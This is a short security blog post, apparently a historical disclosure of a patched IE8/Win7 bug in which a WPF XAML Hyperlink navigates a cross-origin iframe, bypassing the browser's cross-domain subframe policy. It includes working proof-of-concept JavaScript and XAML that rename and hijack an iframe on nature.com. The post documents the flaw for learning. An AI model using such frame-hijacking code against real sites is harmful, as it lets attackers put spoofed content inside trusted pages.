XAML Hyperlink Cross-Origin Sub-Frame Navigation

A WPF XAML Hyperlink element with a TargetName can navigate an iframe by name — including iframes belonging to other domains — bypassing the “Allow subframes to navigate across different domains” policy that blocks JavaScript from doing the same thing.

<script language="JavaScript">
var newWindow, interval_setIFrameName;
function openWindow()
{
    newWindow = window.open("http://www.nature.com");
    interval_setIFrameName = setInterval('setIFrameName()', 1000);
}

function setIFrameName()
{
    var strIframeName = "HIJACKED_IFRAME";
    if (newWindow.length > 0)
    {
        // Naming a cross-origin iframe is apparently allowed
        newWindow[0].name = strIframeName;
        alert("Now click on the xaml link to hijack nature's IFRAME");
        clearInterval(interval_setIFrameName);
    }
}
</script>

<iframe src="hyperlink.xaml" width="300" height="100"></iframe>

The XAML file (hyperlink.xaml) contains:

<Hyperlink TargetName="HIJACKED_IFRAME" NavigateUri="hijacked_iframe.html">
    click here to hijack...
</Hyperlink>

A regular HTML link with target="HIJACKED_IFRAME" opens a new window instead of redirecting the cross-origin iframe, which is the correct behavior. The XAML Hyperlink skipped that check. Tested on IE8/Win7.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Pop-up Blocker Bypass via Windows Media Player 12] :: [XBAP Clipboard Hijacker] >